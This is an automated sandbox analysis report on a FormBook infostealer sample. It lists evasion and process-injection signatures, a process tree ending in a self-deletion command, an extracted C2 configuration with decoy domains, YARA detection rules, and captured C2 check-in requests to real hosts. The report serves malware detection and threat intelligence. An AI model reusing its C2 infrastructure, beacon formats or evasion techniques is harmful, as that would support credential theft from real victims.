
Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name: divpCHa0h7.exe
Analysis ID: 502315
MD5: fda0d823b262ac2b1bd76a2053c29692
SHA1: 73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256: 91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.divpCHa0h7.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.divpCHa0h7.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.divpCHa0h7.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: divpCHa0h7.exe | Virustotal: Detection: 16%
Source: divpCHa0h7.exe | ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
Source: 5.2.divpCHa0h7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.divpCHa0h7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: divpCHa0h7.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: divpCHa0h7.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL | source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: divpCHa0h7.exe, msdt.exe
Source: Binary string: msdt.pdb | source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.161 80
Source: C:\Windows\explorer.exe | Domain query: www.mambacustomboats.com
Source: C:\Windows\explorer.exe | Domain query: www.sanlifalan.com
Source: C:\Windows\explorer.exe | Domain query: www.esyscoloradosprings.com
Source: C:\Windows\explorer.exe | Network Connect: 104.165.34.6 80
Source: C:\Windows\explorer.exe | Network Connect: 108.167.135.122 80
Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe | Domain query: www.ribbonofficial.com
Source: C:\Windows\explorer.exe | Domain query: www.floaterslaser.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.esyscoloradosprings.com/fqiq/
Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1 | Host: www.ribbonofficial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.sanlifalan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1 | Host: www.floaterslaser.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.mambacustomboats.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.esyscoloradosprings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Wed, 13 Oct 2021 17:47:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: 216 | X-Sorting-Hat-ShopId: 59389116584 | X-Dc: gcp-europe-west1 | X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963 | X-Content-Type-Options: nosniff | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Download-Options: noopen | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 69da64d2c8f74303-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Raw: [hex dump omitted] | Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Oct 2021 17:47:45 GMT | Server: Apache/2.4.51 (Unix) | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: [hex dump omitted] | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable | Content-Type: text/html; charset=UTF-8 | Content-Length: 884 | Connection: close | P3P: CP="CAO PSA OUR" | Expires: Thu, 01 Jan 1970 00:00:00 GMT | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Pragma: no-cache | Data Raw: [hex dump omitted] | Data Ascii: <html><head><title>Virus/Spyware Download Bloc
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comasno
Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX
Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comn
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/c
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn_
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cna-d
Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnl
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr-f
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ri
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coma-d
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown | DNS traffic detected: queries for: www.ribbonofficial.com
          Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1 | Host: www.ribbonofficial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.sanlifalan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1 | Host: www.floaterslaser.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.mambacustomboats.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.esyscoloradosprings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
